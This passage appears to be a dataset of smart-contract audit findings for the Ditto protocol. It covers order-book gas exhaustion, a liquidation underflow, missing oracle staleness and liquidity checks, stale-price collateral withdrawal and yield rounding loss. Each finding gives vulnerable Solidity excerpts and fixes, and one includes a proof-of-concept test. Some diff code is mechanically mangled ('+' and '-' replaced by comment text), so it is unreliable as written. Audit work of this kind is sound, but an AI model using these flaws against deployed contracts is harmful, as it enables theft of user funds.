HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOrders.sol#L927-L947\\nBut it is possible that the initial order was cancelled and the id reused multiple times with the previous order being close to the market price resulting in a match. 
This can lead to a possible exhaustion of gas if the user's order has a price far from the top of the orderbook.\\nExample scenario\\nCurrent state of bids in orderbook:\\nTop bid 2000\\nTotal bids 1000\\nBids ids are from 100 to 999. No order is cancelled and reusable.\\nA user wants to bid at 1700 which would be the 800th order pricewise.\\nUser calls `createBid` passing in `[799,798]` for the orderHintArray.\\nThe following tx's occur in the same block before the user's `createBid` call in the following order.\\nOrder id `799` gets cancelled.\\nAnother user creates a limit order at `2001` which now has order id `799` since it is reused.\\nA market/new limit ask order fills the bid.\\nAnother user creates a limit order at price `1800`.\\nIn `createBid` when finding the hint id, the condition `prevOrderType == O.Matched` will pass and the hintId returned will be the `HEAD`.\\nThe loop starts to check for the price match from `HEAD` and exhausts gas before iterating over 800 bids.чI think the probability of the above scenario is higher than that of multiple user's cancelling their orders. 
Hence moving to the next hint order as soon as the current hint order has been found to be reused could be better and will cost less gas on error.чOrder creation can run out-of-gas on particular flow\\nTest Code\\nAdd the following change in test/AskSellOrders.t.sol and run\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/test/AskSellOrders.t.sol b/test/AskSellOrders.t.sol\\nindex 4e8a4a9..264ea32 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/test/AskSellOrders.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/AskSellOrders.t.sol\\n@@ // Remove the line below\\n8,7 // Add the line below\\n8,7 @@ import {Errors} from \"contracts/libraries/Errors.sol\";\\n import {STypes, MTypes, O} from \"contracts/libraries/DataTypes.sol\";\\n \\n import {OBFixture} from \"test/utils/OBFixture.sol\";\\n// Remove the line below\\n// import {console} from \"contracts/libraries/console.sol\";\\n// Add the line below\\nimport {console} from \"contracts/libraries/console.sol\";\\n \\n contract SellOrdersTest is OBFixture {\\n using U256 for uint256;\\n@@ // Remove the line below\\n59,6 // Add the line below\\n59,49 @@ contract SellOrdersTest is OBFixture {\\n assertEq(asks[0].price, DEFAULT_PRICE);\\n }\\n \\n// Add the line below\\n function testPossibleOutOfGasInLoopDueToHighIterations() public {\\n// Add the line below\\n for (uint256 i = 0; i < 1000; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // a new order at the bottom of the order book\\n// Add the line below\\n fundLimitAskOpt(HIGHER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[1000].price == HIGHER_PRICE);\\n// Add the line below\\n assertTrue(getAsks()[1000].ercAmount == DEFAULT_AMOUNT);\\n// Add the line 
below\\n\\n// Add the line below\\n // user wants to create an order at HIGHER_PRICE\\n// Add the line below\\n MTypes.OrderHint[] memory orderHintArray =\\n// Add the line below\\n diamond.getHintArray(asset, HIGHER_PRICE, O.LimitAsk);\\n// Add the line below\\n uint16 targetOrderId = orderHintArray[0].hintId;\\n// Add the line below\\n assertTrue(targetOrderId == getAsks()[1000].id);\\n// Add the line below\\n\\n// Add the line below\\n // the target order gets cancelled\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n cancelAsk(targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a person creates a limit ask which reuses the cancelled order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a bid matches the targetId\\n// Add the line below\\n fundLimitBid(LOWER_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n // another person creates a limit ask which reuses the matched order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // the tx of the user goes through\\n// Add the line below\\n depositUsd(sender, DEFAULT_AMOUNT);\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n uint256 gasStart = gasleft();\\n// Add the line below\\n diamond.createAsk(\\n// Add the line below\\n asset, HIGHER_PRICE, DEFAULT_AMOUNT, Constants.LIMIT_ORDER, orderHintArray\\n// Add the line below\\n );\\n// Add the line below\\n uint256 gasUsed = gasStart // Remove the line below\\n gasleft();\\n// Add the line below\\n assertGt(gasUsed, 2_000_000);\\n// Add the line below\\n console.log(gasUsed);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function 
testAddingLimitSellAskUsdGreaterThanBidUsd() public {\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT * 2, sender);\\n```\\nч```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n -Secondary short liquidation reverts due to arithmetic underflow in volatile market conditionsчmediumчThe `ercDebtAtOraclePrice` is calculated based on the cached Oracle price, which is not updated with the retrieved, potentially fresh spot price due to the 15-minute staleness limit at the beginning of the secondary liquidation call. 
This results in the `ercDebtAtOraclePrice` being greater than the short's available collateral, resulting in an underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from the `m.short.collateral`.\\nShorts with a collateral ratio below `secondaryLiquidationCR`, i.e., 150% by default, can be liquidated in batches via the secondary liquidation mechanism, executed via the `MarginCallSecondaryFacet.liquidateSecondary` function.\\nAll shorts within the batch are iterated, and for each short, important values are kept in memory within the `MTypes.MarginCallSecondary` struct, evaluated in the `_setMarginCallStruct` function. The collateral ratio, `m.cRatio`, is calculated via the `LibShortRecord.getCollateralRatioSpotPrice` function, based on the given oracle price.\\nThe Oracle price is determined by the `LibOracle.getSavedOrSpotOraclePrice` function in line 47, which either returns the current spot price if the cached price is stale (older than 15 min) or the cached price.\\n```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n\\nFurther on, the liquidation proceeds in the `_secondaryLiquidationHelper` function. If the short's `cRatio` is greater than 100% in line 166, the remaining collateral (i.e., the collateral minus the debt) is refunded. 
It is either refunded to the shorter if the `cRatio` is greater than 110% (m.minimumCR), or, otherwise, to the TAPP (address(this)).\\ncontracts/facets/MarginCallSecondaryFacet.sol#L177\\n```\\nfunction _secondaryLiquidationHelper(MTypes.MarginCallSecondary memory m) private {\\n // @dev when cRatio <= 1 liquidator eats loss, so it's expected that only TAPP would call\\n m.liquidatorCollateral = m.short.collateral;\\n if (m.cRatio > 1 ether) {\\n uint88 ercDebtAtOraclePrice =\\n m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n m.liquidatorCollateral = ercDebtAtOraclePrice;\\n // if cRatio > 110%, shorter gets remaining collateral\\n // Otherwise they take a penalty, and remaining goes to the pool\\n address remainingCollateralAddress =\\n m.cRatio > m.minimumCR ? m.shorter : address(this);\\n s.vaultUser[m.vault][remainingCollateralAddress].ethEscrowed +=\\n❌ m.short.collateral - ercDebtAtOraclePrice;\\n }\\n LibShortRecord.disburseCollateral(\\n m.asset,\\n m.shorter,\\n m.short.collateral,\\n m.short.zethYieldRate,\\n m.short.updatedAt\\n );\\n LibShortRecord.deleteShortRecord(m.asset, m.shorter, m.short.id);\\n}\\n```\\n\\nThe value of the debt, `ercDebtAtOraclePrice`, is calculated based on the currently cached price, as the `LibOracle.getPrice` function returns the stored price.\\n[!NOTE] The initially retrieved Oracle price at the beginning of the liquidation call, returned by the `LibOracle.getSavedOrSpotOraclePrice` function, does not store the retrieved spot price in storage if the cached price is stale.\\nConsequently, there are potentially two different asset prices used. The asset's spot price and the cached, stale oracle price.\\nConsider the case where there is a significant difference between the spot price and the cached price. 
This would calculate the `m.cRatio` based on the spot price and the `ercDebtAtOraclePrice` based on the cached price.\\nThis is demonstrated in the following example:\\nConsider the following liquidateable short position (simplified, ignores decimal precision for this demonstration):\\nCollateral Debt Collateralization Ratio (based on spot price) Price ETH/USD Spot Price TOKEN/ETH Cached Price TOKEN/ETH\\n1 ETH 1400 TOKEN $${1 \\over {1400 * 0.0005}} \\approx 142\\%$$ 2000 0.0005 0.00075\\nCalculating the `ercDebtAtOraclePrice` with the cached oracle price `0.00075` for TOKEN/ETH, returned by the `LibOracle.getPrice` function, results in:\\n$$ \\begin{align} ercDebtAtOraclePrice &= debt \\cdot price \\ &= 1400 \\cdot 0.00075 \\ &= 1.05 \\text{ ETH} \\end{align} $$\\nThe resulting debt value, quoted in ETH, is `1.05 ETH`, which is larger than the short's available collateral, `m.short.collateral = 1 ETH`.\\nThis results in an arithmetic underflow error attempting to subtract the calculated `ercDebtAtOraclePrice` from `m.short.collateral` in line 177.\\nSpecifically, this scenario occurs in the following situation:\\nA user opens a short position with a collateral of $1 \\text{ ETH}$ and a debt of $1400 \\text{ TOKEN}$ at TOKEN/ETH price of $0.00014286 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00014286 = 0.2 \\text{ ETH}$ -> CR = $1/0.2 = 500\\%$\\nThe spot (oracle) price of TOKEN/ETH increases from $0.00014286 \\text{ ETH}$ to $0.00075 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00075 = 1.05 \\text{ ETH}$ -> CR = $1 / 1.05 \\approx 95\\%$ (eligible for secondary liquidation - also for primary liquidation due to < 110%)\\nNew orders for the TOKEN asset are added to the order book, leading to the oracle price being updated/cached to $0.00075 \\text{ ETH}$ per TOKEN\\n~15min after the price got updated and cached, the TOKEN/ETH spot price decreases from $0.00075 \\text{ ETH}$ to $0.0005 \\text{ ETH}$. 
The CR improves -> CR = $1/(1400 * 0.0005) \\approx 142\\%$\\nSecondary liquidation is attempted to liquidate the short (primary short liquidation is not possible due to the 110% CR limit)\\nDuring the secondary liquidation call, `m.cRatio` is calculated based on the recent spot price (in step 4, due to cached price older than 15min) of $0.0005 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.0005 = 0.7 \\text{ ETH}$ -> CR = $ 1 / 0.7 \\approx 142\\%$\\nIn line 168, `ercDebtAtOraclePrice` is calculated based on the previously cached oracle price of $0.00075 \\text{ ETH}$ -> $1400 * 0.00075 = 1.05 \\text{ ETH}$\\nIn line 176, `m.short.collateral` is subtracted by `ercDebtAtOraclePrice` -> $1 - 1.05= -0.05 \\text{ ETH}$ -> arithmetic underflow error -> reverts!чConsider also using the minimum of the `m.short.collateral` and `ercDebtAtOraclePrice` values, as similarly done in lines 204-205.чThe secondary short liquidation mechanism reverts in certain market situations, forcing liquidators to wait for the CR to decrease further to be able to use the primary liquidation mechanism. This puts the overall collateral ratio and, thus the asset peg under pressure as liquidations can not be executed in a timely manner.ч```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n -Lack of essential stale check in oracleCircuitBreaker()чmediumчThe `LibOracle::oracleCircuitBreaker()` lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\". 
Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\" when compared to the `baseOracleCircuitBreaker()`.\\nWithout the check of the condition: \"block.timestamp > 2 hours + baseTimeStamp\", the `oracleCircuitBreaker()` will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nFor this reason, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale.\\n```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: \"block.timestamp > 2 hours + baseTimeStamp\"\\n\\n if (invalidFetchData) revert 
Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n\\nThe oracleCircuitBreaker() lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\": https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L120-L123\\nWhereas the baseOracleCircuitBreaker() checks that condition: https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L73чAdd the condition: \"block.timestamp > 2 hours + baseTimeStamp\" in the `oracleCircuitBreaker()` to provide the stale check.\\n```\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n// Remove the line below\\n || baseChainlinkPrice <= 0;\\n// Add the line below\\n || baseChainlinkPrice <= 0 || block.timestamp > 2 hours // Add the line below\\n baseTimeStamp;\\n\\n if (invalidFetchData) 
revert Errors.InvalidPrice();\\n }\\n```\\nчThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nConsequently, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale. The stale price will be consumed by core functions of the protocol, leading to harming the funds of the protocol and its users.ч```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: \"block.timestamp > 2 hours + baseTimeStamp\"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 
chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n -LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulationчlowчAs per the documentation, LibOracle should only be returning the TWAP price from the WETH/USDC pool if the amount of WETH in the pool is >= 100e18. This is to ensure the fidelity of the data, which reduces the risk of price manipulation. However, this is not properly implemented for the case in which there was an invalid fetch of chainlink data. In this case, LibOracle simply returns the TWAP price without checking if there's enough liquidity in the pool. 
This can lead to a lack of data fidelity for the returned price.\\nIt's clear that reverting should be the correct action rather than returning the TWAP price without checking the liquidity, as even when there is a valid chainlink price, if the TWAP price is closer to the cached price (and there isn't enough liquidity), it will still revert.\\nLibOracle has a `baseOracleCircuitBreaker` function which handles whether to return the TWAP price or the chainlink price, when the asset is USD, and it is defined as follows:\\n```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n\\nWhen `invalidFetchData` is true, meaning that the chainlink price was not properly fetched, it will always return `twapPriceInv`. 
However, this lacks any checks as to whether there is at least 100 WETH in the Uniswap pool, which can result in a lack of data fidelity.чLibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation\\nBefore returning the TWAP price when `invalidFetchData` is true, first check whether the WETH/USDC pool has enough liquidity.чWhen the chainlink oracle is not functioning correctly, LibOracle will always return the TWAP price for the USD asset. However, this lacks any check as to whether there is enough liquidity in the Uniswap pool to guarantee data fidelity, meaning there is a higher likelihood of price manipulation.ч```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n -Decreasing and increasing a short's collateral potentially uses an outdated asset price to calculate the collateral ratioчmediumчThe `decreaseCollateral` and `increaseCollateral` functions in the `ShortRecordFacet` contract calculate the short's collateral ratio based on the cached asset price, which may be outdated, leading to a divergence between the actual collateral ratio (based on the 
asset spot price) and the calculated collateral ratio.\\nAccording to the conditions for updating the oracle, decreasing the short's collateral via the `ShortRecordFacet.decreaseCollateral` function should update the oracle price if the oracle price is older than 15 minutes.\\nHowever, in the current implementation of the `decreaseCollateral` function, the short's collateral ratio, `cRatio`, is calculated by calling the `getCollateralRatio` function in line 94:\\n```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n\\nThe called `getCollateralRatio` function uses the `LibOracle.getPrice` function to calculate the collateral ratio:\\n```\\nfunction getCollateralRatio(STypes.ShortRecord memory short, address asset)\\n internal\\n view\\n returns (uint256 cRatio)\\n{\\n return short.collateral.div(short.ercDebt.mul(LibOracle.getPrice(asset)));\\n}\\n```\\n\\nThe `LibOracle.getPrice` function returns the currently cached asset price, which potentially is older than 15 minutes.\\n```\\nfunction getPrice(address asset) internal view returns (uint80 oraclePrice) {\\n AppStorage storage s = appStorage();\\n return uint80(s.bids[asset][Constants.HEAD].ercAmount);\\n}\\n```\\n\\nConsequently, the calculated `cRatio` 
in line 94 of the `decreaseCollateral` function is based on the potentially outdated asset price, resulting in the collateral ratio being inaccurate and diverging from the actual collateral ratio based on the current asset spot price.\\nA short owner can exploit this by decreasing the short's collateral up to the point where the resulting collateral ratio is equal to the initial margin (i.e., 500%). As the collateral ratio, `cRatio`, is calculated in line 94 based on the outdated cached oracle price, the short owner can withdraw more collateral than the actual collateral ratio (based on the asset spot price) would allow.\\nSimilarly, the `increaseCollateral` function is affected as well.чConsider using the `LibOracle.getSavedOrSpotOraclePrice` function together with the `getCollateralRatioSpotPrice` function to calculate the collateral ratio based on the current asset price.чShort-position owners can withdraw more collateral than eligible, negatively affecting the overall asset's collateral ratio.ч```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n -Loss of ETH yield due to rounding error when updating the yield rate in the `updateYield` functionчlowчUpdating the vault's yield rate in the 
`LibVault.updateYield` function can lead to a loss of yield if the newly received ETH yield is small due to rounding errors.\\nThe `updateYield` function in the `LibVault` library is called by the permissionless `YieldFacet.updateYield` function and used to update the vault's yield rate from staking rewards earned by bridge contracts holding LSD.\\nThe newly accumulated yield, i.e., ETH received since the last update, is calculated by subtracting the current `zethTotalNew` from the previously stored yield `zethTotal`, as seen in line 75 of the `updateYield` function.\\ncontracts/libraries/LibVault.sol#L92\\n```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n\\nAfter determining the new `yield` (ETH), a fraction of the `yield` is assigned to the TAPP (treasury). 
Thereafter, the remaining `yield` is realized by adding it to the vault's `yield` rate (zethYieldRate), which is calculated by dividing the `yield` by the vault's short collateral, `zethCollateral`.\\n[!NOTE] Both the `yield` and `zethCollateral` values are in 18 decimal precision due to tracking ETH balances.\\nBy using the `divU80` function, the `zethYieldRate` is calculated as $zethYieldRate = \\frac{yield \\cdot 10^{18}}{zethCollateral}$\\nHowever, if the numerator is smaller than the denominator, i.e., the received ETH yield is very small and the vault's collateral large enough, the result of the division will be rounded down to 0, leading to a loss of the remaining yield.\\nAs anyone is able to call the public `YieldFacet.updateYield` function, this can be used to maliciously cause a loss of yield for all users if the newly received yield is small.\\nThe following test case demonstrates the described rounding error:\\nчConsider storing the rounding error and applying the correcting factor (error stored) the next time, or alternatively, prevent (skip) updating the yield if the resulting yield is 0.чLoss of LSD ETH yield for users of the same vault.ч```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = 
yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n -Use of hardcoded price deviation in baseOracleCircuitBreaker()чlowчThe `LibOracle::baseOracleCircuitBreaker()` uses the hardcoded value of 50% price deviation, which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe `baseOracleCircuitBreaker()` is used for verifying the price reported by Chainlink. If the reported price is invalid or its price deviation when compared to the protocol's cached oracle price is more than 50%, the function will fall back to get Uniswap's TWAP price instead.\\nHowever, the `baseOracleCircuitBreaker()` uses a 